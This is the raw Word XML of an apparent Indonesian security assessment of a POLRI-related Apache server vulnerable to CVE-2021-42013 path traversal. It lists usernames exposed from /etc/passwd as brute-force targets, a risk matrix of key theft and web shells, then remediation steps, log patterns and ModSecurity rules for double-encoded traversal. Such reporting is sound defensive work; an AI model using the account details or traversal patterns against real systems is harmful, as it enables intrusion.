      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="53EA8356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E0A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Confidentiality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C32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w="3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E2E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Baca file arbitrer: /etc/passwd, konfigurasi, private keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A90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Ekspos kredensial DB, SSH keys, API keys, data pengguna POLRI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="057CC7ED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D52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Integrity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FACC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w="3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A58CE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Modifikasi file sistem, web defacement, injeksi kode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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E5F4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Tanam web shell, modifikasi log, ubah konfigurasi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="2FA81F7B" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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10A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Availability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07E8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w="3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7827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Matikan atau restart service Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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8FE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DoS server, konsumsi resource, ransomware deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="19219836" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="75AD86CB" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">17.2 Data Exposure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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3DDBF625" wp14:textId="77777777"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26B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3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D6EF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9569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</w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3BFDB615" wp14:textId="77777777"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71B9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Jumlah akun terekspos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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C332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31 akun dari /etc/passwd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8ECD" wp14:textId="7737C32E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Medium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username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saja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tanpa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password hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="259D6619" wp14:textId="77777777"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0964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Akun dengan shell aktif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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20A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5 akun: root, infra, admdumas, webuzo, emps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66A4" wp14:textId="3C78C60F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target SSH brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="0B528302" wp14:textId="77777777"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FC77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UID=0 (root) terekspos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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E506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root:x:0:0:root:/root:/bin/bash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EA68" wp14:textId="56CCFA68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Critical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jika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ada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kelemahan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lain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="281DB9F0" wp14:textId="77777777"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31F3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Home directory paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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DBB0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Terekspos untuk semua akun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B064" wp14:textId="5E3B6950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Medium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info reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="652B925A" wp14:textId="77777777"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0EBF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Shell binary paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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264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Terkonfirmasi /bin/bash tersedia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9D04" wp14:textId="502E8A72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High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digunakan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untuk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RCE payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3B57285C" wp14:textId="77777777"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36F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Service accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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C9E5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webuzo, postfix, sshd, ntp, chrony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F6FB" wp14:textId="32AFACC1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Medium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attack surface mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="5B23AECB" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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63B0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OS Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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DF2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Linux kernel, x86_64, CentOS/RHEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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DA47" wp14:textId="66CD2F89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Medium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bantu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pilih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 xml:space="preserve"> exploit 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lanjutan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="296FEF7D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2351138B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18. Risk Assessment Matrix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400"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="1760"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="4D66E05A" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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5827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Skenario Risiko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E3E0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468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2497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Risk Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8FCF" wp14:textId="77777777">
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7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Prioritas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="251E1D57" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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5168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Baca /etc/passwd dan file konfigurasi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D536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Sangat Tinggi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C90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A8D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9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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AAB6" wp14:textId="38AD67C1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P1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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="5154F647" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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D415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Eksekusi perintah via RCE (mod_cgi aktif)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14BB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Tinggi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8F0D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8933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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7C90" wp14:textId="67D2999A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P1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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="10BD92F2" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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9B09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Harvest SSH private keys dari /home/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D44C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Sedang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D97E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1F5A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8.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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9777" wp14:textId="7B77BA4B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P1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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="140EC236" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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1AF3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Baca kredensial database dari .env/config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289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Sedang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3CAB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FBE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8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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B124" wp14:textId="2F35419C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P1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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="0DB315EE" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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058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Lateral movement ke sistem internal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AF2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Rendah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B33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016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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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62BC" wp14:textId="23424A19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P2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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="1B2274D9" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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29F5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Persistent web shell / backdoor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4B4F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Rendah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51E1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0A1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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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A149" wp14:textId="18281D3D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P2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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="490BF660" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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8B40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Data breach informasi operasional POLRI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6E1A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Rendah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9DD9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F377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7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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1461" wp14:textId="44C5B818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P2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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="231386EB" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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495D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Ransomware deployment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7142" wp14:textId="77777777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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sangat Rendah</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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B143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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="160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F2D4" wp14:textId="77777777">
            <w:r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6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1760" w:type="dxa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3C89" wp14:textId="1133C26A"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P3 </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A397">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7194DBDC" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2328FD6F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19. Recommendations &amp; Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="192F49E4" wp14:textId="4BE3107B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19.1 Priority 1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 Immediate Actions (0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24 Jam)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5C68FC8D" wp14:textId="1271273F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KRITIS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Upgrade Apache HTTP Server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versi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2.4.51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atau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lebih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baru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Versi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2.4.49 dan 2.4.50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keduanya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terbukti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rentan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Verifikasi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dengan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: httpd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v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atau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apache2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v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setelah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upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6DA13944" wp14:textId="56BB2E77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KRITIS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Ubah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konfigurasi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&lt;Directory /&gt;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dari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'Require all granted'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menjadi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'Require all denied' di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seluruh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file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konfigurasi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(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httpd.conf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semua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file di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conf.d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/ dan sites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enabled/).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5D391664" wp14:textId="1A4D65E6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KRITIS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Nonaktifkan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mod_cgi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mod_cgid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jika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tidak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dibutuhkan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Tambahkan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'#' di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depan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LoadModule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cgi_module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cgid_module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di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httpd.conf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6316E97E" wp14:textId="1F47FD08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KRITIS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Lakukan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audit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menyeluruh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terhadap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semua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akun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sistem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dari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/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etc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/passwd.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Nonaktifkan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akun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tidak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perlu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shell (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ubah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/bin/bash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menjadi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/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sbin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/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nologin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).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5B66FC45" wp14:textId="6B31B98D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TINGGI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Periksa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seluruh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log Apache access.log dan error.log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tanda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tanda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eksploitasi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terjadi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Cari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pola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%%32%65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atau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.%2e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log.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="769D0D3C" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="71024ACD" wp14:textId="3D4759EE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19.2 Priority 2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 xml:space="preserve"> Short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Term Actions (1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</w:rPr>
        <w:t>7 Hari)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="640C0528" wp14:textId="1DB2F730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Implementasi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WAF (Web Application Firewall)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dengan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rule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khusus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memblokir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pola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double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URL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encoding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Rekomendasi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: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ModSecurity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dengan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ruleset OWASP CRS.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0232E2EB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Aktifkan logging yang komprehensif: ErrorLog, CustomLog dengan format combined, dan LogLevel warn untuk semua virtual host.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6CF277C3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Pasang IDS/IPS (Snort/Suricata) dengan rules yang telah disediakan di Section 16.3.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3823CDF0" wp14:textId="15526D39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Lakukan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credential rotation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semua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akun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terekspos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terutama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menggunakan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password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sama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di multiple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sistem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0B449360" wp14:textId="08DD8F13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Audit dan hardening SSH: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nonaktifkan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password authentication,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gunakan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hanya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key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based auth,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batasi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user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boleh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SSH.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="54CD245A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="13980E98" wp14:textId="72869CD4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19.3 Priority 3 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Long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Term Actions (1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4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Minggu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)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1FD8B308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Implementasi vulnerability management program yang terstruktur: subscribe ke Apache Security Advisories, CISA KEV, dan NVD notifications.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0D081F46" wp14:textId="2BD09D94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Tetapkan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SLA patch management: Critical (CVSS 9+)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harus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di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patch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24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jam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; High (7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8.9)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72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jam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; Medium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2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minggu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45A7D087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Lakukan penetration testing berkala minimal 2x per tahun dengan scope yang mencakup seluruh infrastruktur yang menghadap internet.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="32212922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Implementasi File Integrity Monitoring (FIM) menggunakan AIDE atau Tripwire untuk mendeteksi perubahan file sistem yang tidak sah.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="21508A5C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Terapkan prinsip Defense in Depth: network segmentation, WAF, IDS/IPS, endpoint security, dan monitoring terpusat (SIEM).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4ED7244A" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="6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Adakan pelatihan keamanan siber bagi administrator sistem, dengan penekanan pada manajemen patch dan monitoring keamanan.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1231BE67" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7A30F8AC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20. Secure Configuration Hardening Guide</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5B4F487F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20.1 Konfigurasi Apache yang Aman</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1B3275ED" wp14:textId="231D3BE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etc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/httpd/conf/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httpd.conf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Konfigurasi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Aman</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="18E0CE5E" wp14:textId="25B6A1B2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# Last updated: 2024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01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07 per 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42013 remediation</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="714FDA4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01D7C3F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1. Batasi akses ke seluruh filesystem</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="182A417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&lt;Directory /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="35CF585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AllowOverride None</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3BE8F3B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Require all denied          # WAJIB: tolak semua akses ke root</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="591DFB2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&lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B0679C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2448401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2. Izinkan hanya direktori yang diperlukan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="289254D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&lt;Directory "/var/www/html"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0386E945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AllowOverride None</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5C38D6D6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Require all granted</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1BF2868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&lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="637C29F4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2D24F7F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3. Nonaktifkan direktori listing</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="77C21CCF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&lt;Directory "/var/www/html"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7797B1E7" wp14:textId="19B5724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Options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Indexes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FollowSymLinks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#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Nonaktifkan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listing &amp;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symlinks</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="06FC3552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&lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7913A28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2E5F7F6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4. Sembunyikan versi Apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="57705DC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ServerTokens Prod</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="461C446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ServerSignature Off</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2F0EC2E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187915E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5. Nonaktifkan metode berbahaya</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2505CE1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&lt;LimitExcept GET POST HEAD&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1B92C6E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Require all denied</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6058A40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&lt;/LimitExcept&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1B642F8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0A7DFA9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6. Header keamanan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="79796A67" wp14:textId="18822E10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Header always set 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Type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Options "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nosniff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"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="56AD017C" wp14:textId="66495992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Header always set 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Frame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Options "SAMEORIGIN"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7A7B04D2" wp14:textId="79B019C3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Header always set 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XSS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Protection "1; mode=block"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5B890548" wp14:textId="0426DB1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Header always set Strict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Transport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Security "max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age=63072000"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7603C723" wp14:textId="4E65609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Header always set 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Security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Policy "default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src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'self'"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="771006AA" wp14:textId="7A8FB1A8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Header always set Referrer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Policy "strict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origin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when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cross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origin"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="35847AC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40A44944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7. Nonaktifkan mod_cgi jika tidak diperlukan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="47EC59DF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#LoadModule cgi_module modules/mod_cgi.so</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1C1688D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#LoadModule cgid_module modules/mod_cgid.so</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2F1B62F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7B8068F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8. Rate limiting (mod_evasive)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0359535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&lt;IfModule mod_evasive24.c&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5BB55F5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DOSHashTableSize    3097</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="74A2A7F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DOSPageCount        2</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="58D7C8A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DOSSiteCount        50</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="604473D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DOSPageInterval     1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="45D125FD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DOSSiteInterval     1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="25DFD04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DOSBlockingPeriod   10</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="68D518F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&lt;/IfModule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="36FEB5B0" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1926F884" wp14:textId="56C47E5C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20.2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ModSecurity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WAF Rule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untuk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 CVE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2021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42013</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="12DB5A0C" wp14:textId="0ACCC8D0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ModSecurity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Custom Rule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42013</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="54C7EA9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Tambahkan ke /etc/httpd/modsecurity.d/custom_rules.conf</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="26E74E7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257ABDC9" wp14:textId="511F3A1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Rule 1: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Blokir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double URL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encoded dot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dot</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="662BFAC9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SecRule REQUEST_URI "@rx %%32%65|%%32%45" \</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="13DCED6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"id:9001001,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B0CDC4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phase:1,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5314FD9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deny,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3ED33A1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status:403,</w:t>
      </w:r>
    </w:p>
